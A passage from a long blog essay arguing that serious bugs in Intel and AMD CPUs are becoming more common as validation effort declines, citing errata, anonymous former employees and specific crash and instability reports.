prime95, a commonly used tool for benchmarking and burn-in, causes their entire system to lock up. Intel's response to this was:
Intel has identified an issue that potentially affects the 6th Gen Intel® Core™ family of products. This issue only occurs under certain complex workload conditions, like those that may be encountered when running applications like Prime95. In those cases, the processor may hang or cause unpredictable system behavior.
which reveals almost nothing about what's actually going on. If you look at their errata list, you'll find that this is typical, except that they normally won't even name the application that was used to trigger the bug. For example, one of the current errata lists has entries like
As we've seen, “unexpected system behavior” can mean that we're completely screwed. Machine checks aren't great either -- they cause Windows to blue screen and Linux to kernel panic. An incorrect address on a page fault is potentially even worse than a mere crash, and if you dig through the list you can find a lot of other scary sounding bugs.
And keep in mind that the Intel errata list has the following disclaimer:
Errata remain in the specification update throughout the product's lifecycle, or until a particular stepping is no longer commercially available. Under these circumstances, errata removed from the specification update are archived and available upon request.
Once they stop manufacturing a stepping (the hardware equivalent of a point release), they reserve the right to remove the errata and you won't be able to find out what errata your older stepping has unless you're important enough to Intel.
Anyway, back to 2015. We've seen at least two serious bugs in Intel CPUs in the last quarter3, and it's almost certain there are more bugs lurking. Back when I worked at a company that produced Intel compatible CPUs, we did a fair amount of testing and characterization of Intel CPUs; as someone fresh out of school who'd previously assumed that CPUs basically worked, I was surprised by how many bugs we were able to find. Even though I never worked on the characterization and competitive analysis side of things, I still personally found multiple Intel CPU bugs just in the normal course of doing my job, poking around to verify things that seemed non-obvious to me. Turns out things that seem non-obvious to me are sometimes also non-obvious to Intel engineers. As more services move to the cloud and the impact of system hang and reset vulnerabilities increases, we'll see more black hats investing time in finding CPU bugs. We should expect to see a lot more of these when people realize that it's much easier than it seems to find these bugs. There was a time when a CPU family might only have one bug per year, with serious bugs happening once every few years, or even once a decade, but we've moved past that. In part, that's because "unpredictable system behavior" have moved from being an annoying class of bugs that forces you to restart your computation to an attack vector that lets anyone with an AWS account attack random cloud-hosted services, but it's mostly because CPUs have gotten more complex, making them more difficult to test and audit effectively, while Intel appears to be cutting back on validation effort. Ironically, we have hardware virtualization that's supposed to help us with security, but the virtualization is so complicated4 that the hardware virtualization implementation is likely to expose "unpredictable system behavior" bugs that wouldn't otherwise have existed. This isn't to say it's hopeless -- it's possible, in principle, to design CPUs such that a hang bug on one core doesn't crash the entire system. It's just that it's a fair amount of work to do that at every level (cache directories, the uncore, etc., would have to be modified to operate when a core is hung, as well as OS schedulers). No one's done the work because it hasn't previously seemed important.
You'll often hear software folks say that these things don't matter because they can (sometimes) be patched. But, many devices will never get patched, which means that hardware security bugs will leave some devices vulnerable for their entire lifetime. And even if you don't care about consumers, serious bugs are very bad for CPU vendors. At a company I worked for, we once had a bug escape validation and get found after we shipped. One OEM wouldn't talk to us for something like five years after that, and other OEMs that continued working with us had to re-qualify their parts with our microcode patch and they made sure to let us know how expensive that was. Intel has enough weight that OEMs can't just walk away from them after a bug, but they don't have unlimited political capital and every serious bug uses up political capital, even if it can be patched.
This isn't to say that we should try to get to zero bugs. There's always going to be a trade off between development speed and and bug rate and the optimal point probably isn't zero bugs. But we're now regularly seeing severe bugs with security implications, which changes the tradeoff a lot. With something like the FDIV bug you can argue that it's statistically unlikely that any particular user who doesn't run numerical analysis code will be impacted, but security bugs are different. Attackers don't run random code, so you can't just say that it's unlikely that some condition will occur.
After writing this, a person claiming to be an ex-Intel employee said "even with your privileged access, you have no idea" and a pseudo-anonymous commenter on reddit made this comment:
As someone who worked in an Intel Validation group for SOCs until mid-2014 or so I can tell you, yes, you will see more CPU bugs from Intel than you have in the past from the post-FDIV-bug era until recently.
Why?
Let me set the scene: It's late in 2013. Intel is frantic about losing the mobile CPU wars to ARM. Meetings with all the validation groups. Head honcho in charge of Validation says something to the effect of: "We need to move faster. Validation at Intel is taking much longer than it does for our competition. We need to do whatever we can to reduce those times... we can't live forever in the shadow of the early 90's FDIV bug, we need to move on. Our competition is moving much faster than we are" - I'm paraphrasing. Many of the engineers in the room could remember the FDIV bug and the ensuing problems caused for Intel 20 years prior. Many of us were aghast that someone highly placed would suggest we needed to cut corners in validation - that wasn't explicitly said, of course, but that was the implicit message. That meeting there in late 2013 signaled a sea change at Intel to many of us who were there. And it didn't seem like it was going to be a good kind of sea change. Some of us chose to get out while the getting was good. As someone who worked in an Intel Validation group for SOCs until mid-2014 or so I can tell you, yes, you will see more CPU bugs from Intel than you have in the past from the post-FDIV-bug era until recently.
I haven't been able to confirm this story from another source I personally know, although another anonymous commenter said "I left INTC in mid 2013. From validation. This ... is accurate compared with my experience." Another anonymous person, someone I know, didn't hear that speech, but found that at around that time, "velocity" became a buzzword and management spent a lot of time talking about how Intel needs more "velocity" to compete with ARM, which appears to confirm the sentiment, if not the actual speech.
I've also heard from formal methods people that, around the-timeframe mentioned in the first comment, there was an exodus of formal verification folks. One story I've heard is that people left because they were worried about being made redundant. I'm told that, at the time, early retirement packages were being floated around and people strongly suspected layoffs. Another story I've heard is that things got really strange due to Intel's focus on the mobile battle with ARM, and people wanted to leave before things got even worse. But it's hard to say of this means anything, since Intel has been losing a lot of people to Apple because Apple offers better compensation packages and the promise of being less dysfunctional.
I also got anonymous stories about bugs. One person who works in HPC told me that when they were shopping for Haswell parts, a little bird told them that they'd see drastically reduced performance on variants with greater than 12 cores. When they tried building out both 12-core and 16-core systems, they found that they got noticeably better performance on their 12-core systems across a wide variety of workloads. That's not better per-core performance -- that's better absolute performance. Adding 4 more cores reduced the performance on parallel workloads! That was true both in single-socket and two-socket benchmarks.
There's also a mysterious hang during idle/low-activity bug that Intel doesn't seem to have figured out yet.
And then there's this Broadwell bug that hangs Linux if you don't disable low-power states.
And of course Intel isn't the only company with bugs -- this AMD bug found by Robert Swiecki not only allows a VM to crash its host, it also allows a VM to take over the host.
I doubt I've even heard of all the recent bugs and stories about verification/validation. Feel free to send other reports my way.
A number of folks have noticed unusual failure rates in storage devices and switches. This appears to be related to an Intel Atom bug. I find this interesting because the Atom is a relatively simple chip, and therefore a relatively simple chip to verify. When the first-gen Atom was released, folks at Intel seemed proud of how few internal spins of the chip were needed to ship a working production chip that, something made possible by the simplicity of the chip. Modern Atoms are more complicated, but not that much more complicated.
Intel Skylake and Kaby Lake have a hyperthreading bug that's so serious that Debian recommends that users disable hyperthreading to avoid the bug, which can "cause spurious errors, such as application and system misbehavior, data corruption, and data loss".
On the AMD side, there might be a bug that's as serious any recent Intel CPU bug. If you read that linked thread, you'll see an AMD representative asking people to disable SMT, OPCache Control, and changing LLC settings to possibly mitigate or narrow down a serious crashing bug. On another thread, you can find someone reporting an #MC exception with "u-op cache crc mismatch".
Although AMD's response in the forum was that these were isolated issues, phoronix was able to reproduce crashes by running a stress test that consists of compiling a number of open source programs. They report they were able to get 53 segfaults with one hour of attempted compilation.
Some FreeBSD folks have also noticed seemingly unrelated crashes and have been able to get a reproduction by running code at a high address and then firing an interrupt. This can result in a hang or a crash. The reason this appears to be unrelated to the first reported Ryzen issues is that this is easily reproducible with SMT disabled.
Matt Dillon found an AMD bug triggered by DragonflyBSD, and commited a tiny patch to fix it:
There is a bug in Ryzen related to the kernel iretq'ing into a high user %rip address near the end of the user address space (top of user stack). This is a temporary workaround for the issue.
The original %rip for sigtramp was 0x00007fffffffffe0. Moving it down to fa0 wasn't sufficient. Moving it down to f00 moved the bug from nearly instant to taking a few hours to reproduce. Moving it down to be0 it took a day to reproduce. Moving it down to 0x00007ffffffffba0 (this commit) survived the overnight test.
This is an interesting class of attack that takes advantage of speculative execution plus side channel attacks to leak privileged information into user processes. It seems that at least some of these attacks be done from javascript in the browser.
Regarding the comments in the first couple updates on Intel's attitude towards validation recently, another person claiming to be ex-Intel backs up the statements above:
As a former Intel employee this aligns closely with my experience. I didn't work in validation (actually joined as part of Altera) but velocity is an absolute buzzword and the senior management's approach to complex challenges is sheer panic. Slips in schedules are not tolerated at all - so problems in validation are an existential threat, your project can easily just be canned. Also, because of the size of the company the ways in which quality and completeness are 'acheived' is hugely bureaucratic and rarely reflect true engineering fundamentals.
We're approaching a decade since I wrote this post and the serious CPU bugs keep coming. For example, this recent one was found by RAD tools:
Intel Processor Instability Causing Oodle Decompression Failures
We believe that this is a hardware problem which affects primarily Intel 13900K and 14900K processors, less likely 13700, 14700 and other related processors as well. Only a small fraction of those processors will exhibit this behavior. The problem seems to be caused by a combination of BIOS settings and the high clock rates and power usage of these processors, leading to system instability and unpredictable behavior under heavy load ... Any programs which heavily use the processor on many threads may cause crashes or unpredictable behavior. There have been crashes seen in RealBench, CineBench, Prime95, Handbrake, Visual Studio, and more. This problem can also show up as a GPU error message, such as spurious "out of video memory" errors, even though it is caused by the CPU.
One can argue that this is a configuration bug, but from the standpoint of a typical user, all what they observe is that their CPU is causing crashes. And, realistically, Intel knows that their CPUs are shipping into systems with these settings. The mitigation for this involves doing things like changing the following settings ""SVID behavior" → "Intel fail safe", "Long duration power limit" → reduce to 125W if set higher ("Processor Base Power" on ARK)", "Short duration power limit" → reduce to 253W if set higher (for 13900/14900 CPUs, other CPUs have other limits! "Maximum Turbo Power" on ARK)", etc.
If they wanted their CPUs to not crash due to this issue, they could have and should have enforced these settings as well as some others. Instead, they left this up to the BIOS settings, and here we are.
Historically, Intel was much more serious about verification, validation, and testing than AMD and we saw this in their output. At one point, when a lot of enthusiast sites were excited about AMD (in the K7 days), Google stopped using AMD and basically banned purchases of AMD CPUs because they were so buggy and had caused so many hard-to-debug problems. But, over time, the relative level of verification/validation/test effort Intel allocates has gone down and Intel seems to have nearly caught or maybe caught AMD in their rate of really serious bugs. Considering Intel's current market position, with very heavy pressure from AMD, ARM, and Nvidia, it seems unlikely that Intel will turn this around in the foreseeable future. Nvidia, historically, has been significantly buggier than AMD or Intel, so Intel still has quite a bit of room to run to become the most buggy major chip manufacturer. Considering that Nvidia is one of the biggest threats to Intel and how Intel responded to threats from other, then-buggier, manufacturers, it seems like we should expect an even higher rate of bad bugs in the coming decade.
On the specific bug, there's tremendous pressure to operate more like a "move fast and break things" software company than a traditional, conservative, CPU manufacturer for multiple reasons. When you make a manufacture a CPU, how fast it will run ends up being somewhat random and there's no reliable way to tell how fast it will run other than testing it, so CPU companies run a set of tests on the CPU to see how fast it will go. This test time is actually fairly expensive, so there's a lot of work done to try to find the smallest set of tests possible that will correctly determine how fast the CPU can operate. One easy way to cut costs here is to just run fewer tests even if the smaller set of tests doesn't fully guarantee that the CPU can operate at the speed it's sold at.
Another factor influencing this is that CPUs that are sold as nominally faster can sell for more, so there's also pressure to push the CPUs as close to their limits as possible. One way we can see that the margin here has, in general, decreased, is by looking at how overclockable CPUs are. People are often happy with their overclocked CPU if they run a few tests, like prime95, stresstest, etc., and their part doesn't crash, but this isn't nearly enough to determine if the CPU can really run everything a user could throw at it, but if you really try to seriously test a CPU (working at an Intel competitor, we would do this regularly), Intel and other CPU companies have really pushed the limit of how fast they claim their CPUs are relative to how fast they actually are, which sometimes results in CPUs that are sold that have been pushed beyond their capabilities.
On overclocking, as Fabian Giesen of RAD notes,
This stuff is not sanctioned and will count as overclocking if you try to RMA it but it's sold as a major feature of the platform and review sites test with it on.
Daniel Gibson replied with
hmm on my mainboard (ASUS ROG Strix B550-A Gaming -clearly gaming hardware, but middle price range) I had to explicitly enable the XMP/EXPO profile for the DDR4-RAM to run at full speed - which is DDR4-3200, officially supported by the CPU (Ryzen 5950X). Otherwise it ran at DDR4-2400 speed, I think? Or was it 2133? I forgot, at least significantly lower
To which Fabian noted
Correct. Fun fact: turning on EXPO technically voids your warranty ... t's great; both the CPU and the RAM list it as supported but it's officially not.
One might call it a racket, if one were inclined to such incisive language.
Intel didn't used to officially unofficially support this kind of thing. And, more generally, historically, CPU manufacturers were very hesitant to ship parts that had a non-negligible risk of crashes and data corruption when used as intended if they could avoid them, but more and more of these bugs keep happening. Some end up becoming quite public, like this, due to someone publishing a report about them like the RAD report above. And some get quietly reported to the CPU manufacturer by a huge company, often with some kind of NDA agreement, where the big company gets replacement CPUs and Intel or another manufacturer quietly ships firmware fixes to the issue. And it surely must be the case that some of these aren't really caught at all, unless you count the occasional data corruption or crash as being caught.
Thanks to Leah Hanson, Jeff Ligouri, Derek Slager, Ralph Corderoy, Joe Wilder, Nate Martin, Hari Angepat, JonLuca De Caro, Jeff Fowler, and a number of anonymous tipsters for comments/corrections/discussion.